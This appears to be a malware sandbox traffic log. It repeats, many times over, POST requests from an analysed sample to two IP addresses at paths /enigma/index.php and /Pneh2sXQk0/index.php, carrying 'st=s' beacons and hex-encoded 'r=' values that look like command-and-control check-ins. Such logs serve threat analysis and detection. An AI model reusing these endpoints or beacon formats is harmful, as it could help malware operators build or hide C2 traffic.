Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
